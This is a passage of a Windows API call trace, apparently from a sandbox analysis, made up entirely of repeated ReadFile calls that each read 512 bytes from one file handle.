lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 
[0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, 
lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 
lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: 
lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, 
lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 
[0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 